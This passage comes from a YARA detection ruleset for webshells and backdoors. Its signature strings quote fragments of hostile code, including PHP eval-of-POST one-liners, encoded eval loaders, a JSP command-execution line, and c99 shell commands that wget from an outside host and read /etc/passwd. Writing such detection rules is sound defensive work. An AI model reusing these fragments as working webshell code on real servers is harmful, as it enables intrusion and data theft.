   		$s7 = "echo $msg=@copy($_FILES['uploadmyfile']['tmp_name'],\"\".$uploaddir.\"/\".$_FILE"   
   		$s8 = "<option value=\"passthru\" <? if ($execfunc==\"passthru\") { echo \"selected\"; "   
   	condition:   
   		2 of them   
rule Unpack_TBack {   
   	meta:   
   		description = "Webshells Auto-generated - file TBack.dll"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "a9d1007823bf96fb163ab38726b48464"   
   	strings:   
   		$s5 = "\\final\\new\\lcc\\public.dll"   
   	condition:   
   		all of them   
rule phpshell {   
   	meta:   
   		description = "Webshells Auto-generated - file phpshell.php"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "1dccb1ea9f24ffbd085571c88585517b"   
   	strings:   
   		$s1 = "echo \"<input size=\\\"100\\\" type=\\\"text\\\" name=\\\"newfile\\\" value=\\\"$inputfile\\\"><b"   
   		$s2 = "$img[$id] = \"<img height=\\\"16\\\" width=\\\"16\\\" border=\\\"0\\\" src=\\\"$REMOTE_IMAGE_UR"   
   		$s3 = "$file = str_replace(\"\\\\\", \"/\", str_replace(\"//\", \"/\", str_replace(\"\\\\\\\\\", \"\\\\\", "   
   	condition:   
   		all of them   
rule WebShell__findsock_php_findsock_shell_php_reverse_shell {   
   	meta:   
   		description = "PHP Webshells Github Archive - from files findsock.c, php-findsock-shell.php, php-reverse-shell.php"   
   		author = "Florian Roth"   
   		super_rule = 1   
   		hash0 = "5622c9841d76617bfc3cd4cab1932d8349b7044f"   
   		hash1 = "4a20f36035bbae8e342aab0418134e750b881d05"   
   		hash2 = "40dbdc0bdf5218af50741ba011c5286a723fa9bf"   
   	strings:   
   		$s1 = "// me at pentestmonkey@pentestmonkey.net" fullword   
   	condition:   
   		all of them   
rule Ayyildiz_Tim___AYT__Shell_v_2_1_Biz_html {   
   	meta:   
   		description = "Semi-Auto-generated  - file Ayyildiz Tim  -AYT- Shell v 2.1 Biz.html.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "8a8c8bb153bd1ee097559041f2e5cf0a"   
   	strings:   
   		$s0 = "Ayyildiz"   
   		$s1 = "TouCh By iJOo"   
   		$s2 = "First we check if there has been asked for a working directory"   
   		$s3 = "http://ayyildiz.org/images/whosonline2.gif"   
   	condition:   
   		2 of them   
rule webshell_ASP_tool {   
   	meta:   
   		description = "Web Shell - file tool.asp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "4ab68d38527d5834e9c1ff64407b34fb"   
   	strings:   
   		$s0 = "Response.Write \"<FORM action=\"\"\" & Request.ServerVariables(\"URL\") & \"\"\""   
   		$s3 = "Response.Write \"<tr><td><font face='arial' size='2'><b>&lt;DIR&gt; <a href='\" "   
   		$s9 = "Response.Write \"<font face='arial' size='1'><a href=\"\"#\"\" onclick=\"\"javas"   
   	condition:   
   		2 of them   
rule webadmin {   
   	meta:   
   		description = "Webshells Auto-generated - file webadmin.php"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "3a90de401b30e5b590362ba2dde30937"   
   	strings:   
   		$s0 = "<input name=\\\"editfilename\\\" type=\\\"text\\\" class=\\\"style1\\\" value='\".$this->inpu"   
   	condition:   
   		all of them   
rule php_include_w_shell_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file php-include-w-shell.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "4e913f159e33867be729631a7ca46850"   
   	strings:   
   		$s0 = "$dataout .= \"<td><a href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incd"   
   		$s1 = "if($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $strOutput .= DB"   
   	condition:   
   		1 of them   
rule indexer_asp {   
   	meta:   
   		description = "Semi-Auto-generated  - file indexer.asp.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "9ea82afb8c7070817d4cdf686abe0300"   
   	strings:   
   		$s0 = "<td>Nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typ"   
   		$s2 = "D7nD7l.km4snk`JzKnd{n_ejq;bd{KbPur#kQ8AAA==^#~@%>></td><td><input type=\"submit"   
   	condition:   
   		1 of them   
rule FSO_s_remview {   
   	meta:   
   		description = "Webshells Auto-generated - file remview.php"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "b4a09911a5b23e00b55abe546ded691c"   
   	strings:   
   		$s2 = "      echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\""   
   		$s3 = "         echo \"<script>str$i=\\\"\".str_replace(\"\\\"\",\"\\\\\\\"\",str_replace(\"\\\\\",\"\\\\\\\\\""   
   		$s4 = "      echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<"   
   	condition:   
   		all of them   
rule webshell_aZRaiLPhp_v1_0 {   
   	meta:   
   		description = "Web Shell - file aZRaiLPhp v1.0.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "26b2d3943395682e36da06ed493a3715"   
   	strings:   
   		$s5 = "echo \" <font color='#0000FF'>CHMODU \".substr(base_convert(@fileperms($"   
   		$s7 = "echo \"<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><fo"   
   	condition:   
   		all of them   
rule PHP_Shell_v1_7 {   
   	meta:   
   		description = "Webshells Auto-generated - file PHP_Shell_v1.7.php"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "b5978501c7112584532b4ca6fb77cba5"   
   	strings:   
   		$s8 = "<title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]"   
   	condition:   
   		all of them   
rule webshell_WinX_Shell {   
   	meta:   
   		description = "Web Shell - file WinX Shell.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "17ab5086aef89d4951fe9b7c7a561dda"   
   	strings:   
   		$s5 = "print \"<font face=\\\"Verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">Filenam"   
   		$s8 = "print \"<font face=\\\"Verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">File: </"   
   	condition:   
   		all of them   
rule warfiles_cmd : webshell {   
   	meta:   
   		description = "Laudanum Injector Tools - file cmd.jsp"   
   		author = "Florian Roth"   
   		reference = "http://laudanum.inguardians.com/"   
   		date = "2015-06-22"   
   		hash = "3ae3d837e7b362de738cf7fad78eded0dccf601f"   
   	strings:   
   		$s1 = "Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));" fullword ascii /* PEStudio Blacklist: strings */   
   		$s2 = "out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");" fullword ascii /* PEStudio Blacklist: strings */   
   		$s3 = "<FORM METHOD=\"GET\" NAME=\"myform\" ACTION=\"\">" fullword ascii   
   		$s4 = "String disr = dis.readLine();" fullword ascii   
   	condition:   
   		filesize < 2KB and all of them   
rule ngh_php_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file ngh.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "c372b725419cdfd3f8a6371cfeebc2fd"   
   	strings:   
   		$s0 = "Cr4sh_aka_RKL"   
   		$s1 = "NGH edition"   
   		$s2 = "/* connectback-backdoor on perl"   
   		$s3 = "<form action=<?=$script?>?act=bindshell method=POST>"   
   		$s4 = "$logo = \"R0lGODlhMAAwAOYAAAAAAP////r"   
   	condition:   
   		1 of them   
rule webshell_jsp_jdbc {   
   	meta:   
   		description = "Web Shell - file jdbc.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "23b0e6f91a8f0d93b9c51a2a442119ce"   
   	strings:   
   		$s4 = "String cs = request.getParameter(\"z0\")==null?\"gbk\": request.getParameter(\"z"   
   	condition:   
   		all of them   
rule asp_file : webshell {   
   	meta:   
   		description = "Laudanum Injector Tools - file file.asp"   
   		author = "Florian Roth"   
   		reference = "http://laudanum.inguardians.com/"   
   		date = "2015-06-22"   
   		hash = "ff5b1a9598735440bdbaa768b524c639e22f53c5"   
   	strings:   
   		$s1 = "' *** Written by Tim Medin <tim@counterhack.com>" fullword ascii   
   		$s2 = "Response.BinaryWrite(stream.Read)" fullword ascii   
   		$s3 = "Response.Write(Response.Status & Request.ServerVariables(\"REMOTE_ADDR\"))" fullword ascii /* PEStudio Blacklist: strings */   
   		$s4 = "%><a href=\"<%=Request.ServerVariables(\"URL\")%>\">web root</a><br/><%" fullword ascii /* PEStudio Blacklist: strings */   
   		$s5 = "set folder = fso.GetFolder(path)" fullword ascii   
   		$s6 = "Set file = fso.GetFile(filepath)" fullword ascii   
   	condition:   
   		uint16(0) == 0x253c and filesize < 30KB and 5 of them   
rule WebShell_c99_madnet {   
   	meta:   
   		description = "PHP Webshells Github Archive - file c99_madnet.php"   
   		author = "Florian Roth"   
   		hash = "17613df393d0a99fd5bea18b2d4707f566cff219"   
   	strings:   
   		$s0 = "$md5_pass = \"\"; //If no pass then hash" fullword   
   		$s1 = "eval(gzinflate(base64_decode('"   
   		$s2 = "$pass = \"pass\";  //Pass" fullword   
   		$s3 = "$login = \"user\"; //Login" fullword   
   		$s4 = "             //Authentication" fullword   
   	condition:   
   		all of them   
rule webshell_c99_c99shell_c99_w4cking_Shell_xxx {   
   	meta:   
   		description = "Web Shell - from files c99.php, c99shell.php, c99_w4cking.php, Shell [ci] .Biz was here.php, acid.php, c100 v. 777shell v. Undetectable #18a Modded by 777 - Don.php, c66.php, c99-shadows-mod.php, c99.php, c99shell.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "61a92ce63369e2fa4919ef0ff7c51167"   
   		hash1 = "d3f38a6dc54a73d304932d9227a739ec"   
   		hash2 = "9c34adbc8fd8d908cbb341734830f971"   
   		hash3 = "f2fa878de03732fbf5c86d656467ff50"   
   		hash4 = "b8f261a3cdf23398d573aaf55eaf63b5"   
   		hash5 = "27786d1e0b1046a1a7f67ee41c64bf4c"   
   		hash6 = "0f5b9238d281bc6ac13406bb24ac2a5b"   
   		hash7 = "68c0629d08b1664f5bcce7d7f5f71d22"   
   		hash8 = "157b4ac3c7ba3a36e546e81e9279eab5"   
   		hash9 = "048ccc01b873b40d57ce25a4c56ea717"   
   	strings:   
   		$s0 = "echo \"<b>HEXDUMP:</b><nobr>"   
   		$s4 = "if ($filestealth) {$stat = stat($d.$f);}" fullword   
   		$s5 = "while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo \"<tr><td>\".$r"   
   		$s6 = "if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo \"DB "   
   		$s8 = "echo \"<center><b>Server-status variables:</b><br>\";" fullword   
   		$s9 = "echo \"<textarea cols=80 rows=10>\".htmlspecialchars($encoded).\"</textarea>"   
   	condition:   
   		2 of them   
rule shelltools_g0t_root_xwhois {   
   	meta:   
   		description = "Webshells Auto-generated - file xwhois.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "0bc98bd576c80d921a3460f8be8816b4"   
   	strings:   
   		$s1 = "rting! "   
   		$s2 = "aTypCog("   
   		$s5 = "Diamond"   
   		$s6 = "r)r=rQreryr"   
   	condition:   
   		all of them   
rule HYTop_DevPack_2005 {   
   	meta:   
   		description = "Webshells Auto-generated - file 2005.asp"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "63d9fd24fa4d22a41fc5522fc7050f9f"   
   	strings:   
   		$s7 = "theHref=encodeForUrl(mid(replace(lcase(list.path),lcase(server.mapPath(\"/\")),\"\")"   
   		$s8 = "scrollbar-darkshadow-color:#9C9CD3;"   
   		$s9 = "scrollbar-face-color:#E4E4F3;"   
   	condition:   
   		all of them   
rule webshell_c99_madnet_smowu {   
   	meta:   
   		description = "Web Shell - file smowu.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "3aaa8cad47055ba53190020311b0fb83"   
   	strings:   
   		$s0 = "//Authentication" fullword   
   		$s1 = "$login = \"" fullword   
   		$s2 = "eval(gzinflate(base64_decode('"   
   		$s4 = "//Pass"   
   		$s5 = "$md5_pass = \""   
   		$s6 = "//If no pass then hash"   
   	condition:   
   		all of them   
rule webshell_PHP_G5 {   
   	meta:   
   		description = "Web Shell - file G5.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "95b4a56140a650c74ed2ec36f08d757f"   
   	strings:   
   		$s3 = "echo \"Hacking Mode?<br><select name='htype'><option >--------SELECT--------</op"   
   	condition:   
   		all of them   
rule webshell_php_dodo_zip {   
   	meta:   
   		description = "Web Shell - file zip.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "b7800364374077ce8864796240162ad5"   
   	strings:   
   		$s0 = "$hexdtime = '\\x' . $dtime[6] . $dtime[7] . '\\x' . $dtime[4] . $dtime[5] . '\\x"   
   		$s3 = "$datastr = \"\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"   
   	condition:   
   		all of them   
rule Webshell_Insomnia {   
   	meta:   
   		description = "Insomnia Webshell - file InsomniaShell.aspx"   
   		author = "Florian Roth"   
   		reference = "http://www.darknet.org.uk/2014/12/insomniashell-asp-net-reverse-shell-bind-shell/"   
   		date = "2014/12/09"   
   		hash = "e0cfb2ffaa1491aeaf7d3b4ee840f72d42919d22"   
   		score = 80   
   	strings:   
   		$s0 = "Response.Write(\"- Failed to create named pipe:\");" fullword ascii   
   		$s1 = "Response.Output.Write(\"+ Sending {0}<br>\", command);" fullword ascii   
   		$s2 = "String command = \"exec master..xp_cmdshell 'dir > \\\\\\\\127.0.0.1" ascii   
   		$s3 = "Response.Write(\"- Error Getting User Info<br>\");" fullword ascii   
   		$s4 = "string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes," fullword ascii   
   		$s5 = "[DllImport(\"Advapi32.dll\", SetLastError = true)]" fullword ascii   
   		$s9 = "username = DumpAccountSid(tokUser.User.Sid);" fullword ascii   
   		$s14 = "//Response.Output.Write(\"Opened process PID: {0} : {1}<br>\", p" ascii   
   	condition:   
   		3 of them   
rule FSO_s_EFSO_2_2 {   
   	meta:   
   		description = "Webshells Auto-generated - file EFSO_2.asp"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "a341270f9ebd01320a7490c12cb2e64c"   
   	strings:   
   		$s0 = ";!+/DRknD7+.\\mDrC(V+kcJznndm\\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl\"dKVcJ\\CslU,),@!0KxD~mKV"   
   		$s4 = "\\co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX\"b~/fAs!u&9|J\\grKp\"j"   
   	condition:   
   		all of them   
rule WebShell_Generic_PHP_6 {   
   	meta:   
   		description = "PHP Webshells Github Archive - from files c0derz shell [csh] v. 0.1.1 release.php, CrystalShell v.1.php, load_shell.php, Loaderz WEB Shell.php, stres.php"   
   		author = "Florian Roth"   
   		super_rule = 1   
   		hash0 = "1a08f5260c4a2614636dfc108091927799776b13"   
   		hash1 = "335a0851304acedc3f117782b61479bbc0fd655a"   
   		hash2 = "ca9fcfb50645dc0712abdf18d613ed2196e66241"   
   		hash3 = "36d8782d749638fdcaeed540d183dd3c8edc6791"   
   		hash4 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"   
   	strings:   
   		$s2 = "@eval(stripslashes($_POST['phpcode']));" fullword   
   		$s5 = "echo shell_exec($com);" fullword   
   		$s7 = "if($sertype == \"winda\"){" fullword   
   		$s8 = "function execute($com)" fullword   
   		$s12 = "echo decode(execute($cmd));" fullword   
   		$s15 = "echo system($com);" fullword   
   	condition:   
   		4 of them   
rule webshell_asp_404 {   
   	meta:   
   		description = "Web Shell - file 404.asp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "d9fa1e8513dbf59fa5d130f389032a2d"   
   	strings:   
   		$s0 = "lFyw6pd^DKV^4CDRWmmnO1GVKDl:y& f+2"   
   	condition:   
   		all of them   
rule winshell {   
   	meta:   
   		description = "Webshells Auto-generated - file winshell.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "3144410a37dd4c29d004a814a294ea26"   
   	strings:   
   		$s0 = "Software\\Microsoft\\Windows\\CurrentVersion\\RunServices"   
   		$s1 = "WinShell Service"   
   		$s2 = "__GLOBAL_HEAP_SELECTED"   
   		$s3 = "__MSVCRT_HEAP_SELECT"   
   		$s4 = "Provide Windows CmdShell Service"   
   		$s5 = "URLDownloadToFileA"   
   		$s6 = "RegisterServiceProcess"   
   		$s7 = "GetModuleBaseNameA"   
   		$s8 = "WinShell v5.0 (C)2002 janker.org"   
   	condition:   
   		all of them   
rule HYTop2006_rar_Folder_2006Z {   
   	meta:   
   		description = "Webshells Auto-generated - file 2006Z.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "fd1b6129abd4ab177fed135e3b665488"   
   	strings:   
   		$s1 = "wangyong,czy,allen,lcx,Marcos,kEvin1986,myth"   
   		$s8 = "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x"   
   	condition:   
   		all of them   
rule webshell_php_ghost {   
   	meta:   
   		description = "Web Shell - file ghost.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "38dc8383da0859dca82cf0c943dbf16d"   
   	strings:   
   		$s1 = "<?php $OOO000000=urldecode('%61%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64'"   
   		$s6 = "//<img width=1 height=1 src=\"http://websafe.facaiok.com/just7z/sx.asp?u=***.***"   
   		$s7 = "preg_replace('\\'a\\'eis','e'.'v'.'a'.'l'.'(KmU(\"" fullword   
   	condition:   
   		all of them   
rule pwreveal {   
   	meta:   
   		description = "Webshells Auto-generated - file pwreveal.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "b4e8447826a45b76ca45ba151a97ad50"   
   	strings:   
   		$s0 = "*<Blank - no es"   
   		$s3 = "JDiamondCS "   
   		$s8 = "sword set> [Leith=0 bytes]"   
   		$s9 = "ION\\System\\Floating-"   
   	condition:   
   		all of them   
rule WebShell_php_webshells_tryag {   
   	meta:   
   		description = "PHP Webshells Github Archive - file tryag.php"   
   		author = "Florian Roth"   
   		hash = "42d837e9ab764e95ed11b8bd6c29699d13fe4c41"   
   	strings:   
   		$s1 = "<title>TrYaG Team - TrYaG.php - Edited By KingDefacer</title>" fullword   
   		$s3 = "$tabledump = \"DROP TABLE IF EXISTS $table;\\n\"; " fullword   
   		$s6 = "$string = !empty($_POST['string']) ? $_POST['string'] : 0; " fullword   
   		$s7 = "$tabledump .= \"CREATE TABLE $table (\\n\"; " fullword   
   		$s14 = "echo \"<center><div id=logostrip>Edit file: $editfile </div><form action='$REQUE"   
   	condition:   
   		3 of them   
rule webshell_webshells_new_con2 {   
   	meta:   
   		description = "Web shells - generated from file con2.asp"   
   		author = "Florian Roth"   
   		date = "2014/03/28"   
   		score = 70   
   		hash = "d3584159ab299d546bd77c9654932ae3"   
   	strings:   
   		$s7 = ",htaPrewoP(ecalper=htaPrewoP:fI dnE:0=KOtidE:1 - eulaVtni = eulaVtni:nehT 1 => e"   
   		$s10 = "j \"<Form action='\"&URL&\"?Action2=Post' method='post' name='EditForm'><input n"   
   	condition:   
   		1 of them   
rule webshell_browser_201_3_ma_download {   
   	meta:   
   		description = "Web Shell - from files browser.jsp, 201.jsp, 3.jsp, ma.jsp, download.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "37603e44ee6dc1c359feb68a0d566f76"   
   		hash1 = "a7e25b8ac605753ed0c438db93f6c498"   
   		hash2 = "fb8c6c3a69b93e5e7193036fd31a958d"   
   		hash3 = "4cc68fa572e88b669bce606c7ace0ae9"   
   		hash4 = "fa87bbd7201021c1aefee6fcc5b8e25a"   
   	strings:   
   		$s2 = "<small>jsp File Browser version <%= VERSION_NR%> by <a"   
   		$s3 = "else if (fName.endsWith(\".mpg\") || fName.endsWith(\".mpeg\") || fName.endsWith"   
   	condition:   
   		all of them   
rule shelltools_g0t_root_uptime {   
   	meta:   
   		description = "Webshells Auto-generated - file uptime.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "d1f56102bc5d3e2e37ab3ffa392073b9"   
   	strings:   
   		$s0 = "JDiamondCSlC~"   
   		$s1 = "CharactQA"   
   		$s2 = "$Info: This file is packed with the UPX executable packer $"   
   		$s5 = "HandlereateConso"   
   		$s7 = "ION\\System\\FloatingPo"   
   	condition:   
   		all of them   
rule WebShell_cgitelnet {   
   	meta:   
   		description = "PHP Webshells Github Archive - file cgitelnet.php"   
   		author = "Florian Roth"   
   		hash = "72e5f0e4cd438e47b6454de297267770a36cbeb3"   
   	strings:   
   		$s9 = "# Author Homepage: http://www.rohitab.com/" fullword   
   		$s10 = "elsif($Action eq \"command\") # user wants to run a command" fullword   
   		$s18 = "# in a command line on Windows NT." fullword   
   		$s20 = "print \"Transfered $TargetFileSize Bytes.<br>\";" fullword   
   	condition:   
   		2 of them   
rule backdoor1_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file backdoor1.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "e1adda1f866367f52de001257b4d6c98"   
   	strings:   
   		$s1 = "echo \"[DIR] <A HREF=\\\"\".$_SERVER['PHP_SELF'].\"?rep=\".realpath($rep.\".."   
   		$s2 = "class backdoor {"   
   		$s4 = "echo \"<a href=\\\"\".$_SERVER['PHP_SELF'].\"?copy=1\\\">Copier un fichier</a> <"   
   	condition:   
   		1 of them   
rule webshell_webshells_new_xxxx {   
   	meta:   
   		description = "Web shells - generated from file xxxx.php"   
   		author = "Florian Roth"   
   		date = "2014/03/28"   
   		score = 70   
   		hash = "5bcba70b2137375225d8eedcde2c0ebb"   
   	strings:   
   		$s0 = "<?php eval($_POST[1]);?>  " fullword   
   	condition:   
   		all of them   
rule WebShell_Generic_PHP_2 {   
   	meta:   
   		description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, load_shell.php, Loaderz WEB Shell.php, stres.php"   
   		author = "Florian Roth"   
   		super_rule = 1   
   		hash0 = "335a0851304acedc3f117782b61479bbc0fd655a"   
   		hash1 = "ca9fcfb50645dc0712abdf18d613ed2196e66241"   
   		hash2 = "36d8782d749638fdcaeed540d183dd3c8edc6791"   
   		hash3 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"   
   	strings:   
   		$s3 = "if((isset($_POST['fileto']))||(isset($_POST['filefrom'])))" fullword   
   		$s4 = "\\$port = {$_POST['port']};" fullword   
   		$s5 = "$_POST['installpath'] = \"temp.pl\";}" fullword   
   		$s14 = "if(isset($_POST['post']) and $_POST['post'] == \"yes\" and @$HTTP_POST_FILES[\"u"   
   		$s16 = "copy($HTTP_POST_FILES[\"userfile\"][\"tmp_name\"],$HTTP_POST_FILES[\"userfile\"]"   
   	condition:   
   		4 of them   
rule JSP_jfigueiredo_APT_webshell_2 {   
   	meta:   
   		description = "JSP Browser used as web shell by APT groups - author: jfigueiredo"   
   		author = "F.Roth"   
   		date = "12.10.2014"   
   		score = 60   
   		reference = "http://ceso.googlecode.com/svn/web/bko/filemanager/"   
   	strings:   
   		$a1 = "<div id=\"bkorotator\"><img alt=\"\" src=\"images/rotator/1.jpg\"></div>" ascii   
   		$a2 = "$(\"#dialog\").dialog(\"destroy\");" ascii   
   		$s1 = "<form id=\"form\" action=\"ServFMUpload\" method=\"post\" enctype=\"multipart/form-data\">" ascii   
   		$s2 = "<input type=\"hidden\" id=\"fhidden\" name=\"fhidden\" value=\"L3BkZi8=\" />" ascii   
   	condition:   
   		all of ($a*) or all of ($s*)   
rule hkdoordll {   
   	meta:   
   		description = "Webshells Auto-generated - file hkdoordll.dll"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "b715c009d47686c0e62d0981efce2552"   
   	strings:   
   		$s6 = "Can't uninstall,maybe the backdoor is not installed or,the Password you INPUT is"   
   	condition:   
   		all of them   
rule webshell_phpkit_0_1a_odd {   
   	meta:   
   		description = "Web Shell - file odd.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "3c30399e7480c09276f412271f60ed01"   
   	strings:   
   		$s1 = "include('php://input');" fullword   
   		$s3 = "ini_set('allow_url_include, 1'); // Allow url inclusion in this script" fullword   
   		$s4 = "// uses include('php://input') to execute arbritary code" fullword   
   		$s5 = "// php://input based backdoor" fullword   
   	condition:   
   		2 of them   
rule wh_bindshell_py {   
   	meta:   
   		description = "Semi-Auto-generated  - file wh_bindshell.py.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "fab20902862736e24aaae275af5e049c"   
   	strings:   
   		$s0 = "#Use: python wh_bindshell.py [port] [password]"   
   		$s2 = "python -c\"import md5;x=md5.new('you_password');print x.hexdigest()\"" fullword   
   		$s3 = "#bugz: ctrl+c etc =script stoped=" fullword   
   	condition:   
   		1 of them   
rule webshell_Shell_ci_Biz_was_here_c100_v_xxx {   
   	meta:   
   		description = "Web Shell - from files Shell [ci] .Biz was here.php, c100 v. 777shell v. Undetectable #18a Modded by 777 - Don.php, c99-shadows-mod.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "f2fa878de03732fbf5c86d656467ff50"   
   		hash1 = "27786d1e0b1046a1a7f67ee41c64bf4c"   
   		hash2 = "68c0629d08b1664f5bcce7d7f5f71d22"   
   	strings:   
   		$s2 = "if ($data{0} == \"\\x99\" and $data{1} == \"\\x01\") {return \"Error: \".$stri"   
   		$s3 = "<OPTION VALUE=\"find /etc/ -type f -perm -o+w 2> /dev/null\""   
   		$s4 = "<OPTION VALUE=\"cat /proc/version /proc/cpuinfo\">CPUINFO" fullword   
   		$s7 = "<OPTION VALUE=\"wget http://ftp.powernet.com.tr/supermail/de"   
   		$s9 = "<OPTION VALUE=\"cut -d: -f1,2,3 /etc/passwd | grep ::\">USER"   
   	condition:   
   		2 of them   
rule webshell_2_520_job_ma1_ma4_2 {   
   	meta:   
   		description = "Web Shell - from files 2.jsp, 520.jsp, job.jsp, ma1.jsp, ma4.jsp, 2.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "64a3bf9142b045b9062b204db39d4d57"   
   		hash1 = "9abd397c6498c41967b4dd327cf8b55a"   
   		hash2 = "56c005690da2558690c4aa305a31ad37"   
   		hash3 = "532b93e02cddfbb548ce5938fe2f5559"   
   		hash4 = "6e0fa491d620d4af4b67bae9162844ae"   
   		hash5 = "7eabe0f60975c0c73d625b7ddf7b9cbd"   
   	strings:   
   		$s4 = "_url = \"jdbc:microsoft:sqlserver://\" + dbServer + \":\" + dbPort + \";User=\" "   
   		$s9 = "result += \"<meta http-equiv=\\\"refresh\\\" content=\\\"2;url=\" + request.getR"   
   	condition:   
   		all of them   
rule webshell_webshells_new_php6 {   
   	meta:   
   		description = "Web shells - generated from file php6.php"   
   		author = "Florian Roth"   
   		date = "2014/03/28"   
   		score = 70   
   		hash = "ea75280224a735f1e445d244acdfeb7b"   
   	strings:   
   		$s1 = "array_map(\"asx73ert\",(ar"   
   		$s3 = "preg_replace(\"/[errorpage]/e\",$page,\"saft\");" fullword   
   		$s4 = "shell.php?qid=zxexp  " fullword   
   	condition:   
   		1 of them   
rule shelltools_g0t_root_resolve {   
   	meta:   
   		description = "Webshells Auto-generated - file resolve.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "69bf9aa296238610a0e05f99b5540297"   
   	strings:   
   		$s0 = "3^n6B(Ed3"   
   		$s1 = "^uldn'Vt(x"   
   		$s2 = "\\= uPKfp"   
   		$s3 = "'r.axV<ad"   
   		$s4 = "p,modoi$=sr("   
   		$s5 = "DiamondC8S t"   
   		$s6 = "`lQ9fX<ZvJW"   
   	condition:   
   		all of them   
rule WebShell_php_webshells_kral {   
   	meta:   
   		description = "PHP Webshells Github Archive - file kral.php"   
   		author = "Florian Roth"   
   		hash = "4cd1d1a2fd448cecc605970e3a89f3c2e5c80dfc"   
   	strings:   
   		$s1 = "$adres=gethostbyname($ip);" fullword   
   		$s3 = "curl_setopt($ch,CURLOPT_POSTFIELDS,\"domain=\".$site);" fullword   
   		$s4 = "$ekle=\"/index.php?option=com_user&view=reset&layout=confirm\";" fullword   
   		$s16 = "echo $son.' <br> <font color=\"green\">Access</font><br>';" fullword   
   		$s17 = "<p>kodlama by <a href=\"mailto:priv8coder@gmail.com\">BLaSTER</a><br /"   
   		$s20 = "<p><strong>Server listeleyici</strong><br />" fullword   
   	condition:   
   		2 of them   
rule by063cli {   
   	meta:   
   		description = "Webshells Auto-generated - file by063cli.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "49ce26eb97fd13b6d92a5e5d169db859"   
   	strings:   
   		$s2 = "#popmsghello,are you all right?"   
   		$s4 = "connect failed,check your network and remote ip."   
   	condition:   
   		all of them   
rule webshell_jsp_cmdjsp {   
   	meta:   
   		description = "Web Shell - file cmdjsp.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
